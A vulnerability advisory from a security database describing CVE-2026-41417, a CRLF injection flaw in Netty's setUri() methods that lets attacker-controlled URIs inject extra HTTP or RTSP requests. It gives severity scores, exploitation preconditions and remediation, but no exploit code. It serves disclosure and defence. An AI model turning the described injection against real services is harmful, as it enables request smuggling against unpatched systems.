Main Vulnerability Database Vulnerabilities #VU130216

CRLF injection in Netty - CVE-2026-41417

Published: May 5, 2026

Vulnerability identifier: #VU130216

CSH Severity: Medium

CVSSv4.0: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:U/U:Green

CVE-ID: CVE-2026-41417

CWE-ID: CWE-93

Exploitation vector: Remote access

Exploit availability: No public exploit available

Vulnerable software:
Netty

Software vendor:
Netty project

Description

The vulnerability allows a remote attacker to inject additional HTTP or RTSP requests.

The vulnerability exists due to improper neutralization of CRLF sequences in DefaultHttpRequest.setUri() and DefaultFullHttpRequest.setUri() when encoding attacker-controlled URIs into request lines through HttpRequestEncoder or RtspEncoder. A remote attacker can supply a specially crafted URI containing CRLF sequences to inject additional HTTP or RTSP requests.

Exploitation requires an application to create the request object first, later modify it through setUri(), and then serialize it with HttpRequestEncoder or RtspEncoder.

Remediation

Install security update from vendor's website.

External links

https://github.com/netty/netty/security/advisories/GHSA-v8h7-rr48-vmmv

CRLF injection in Netty - CVE-2026-41417

Description

Remediation

External links

Please verify you're human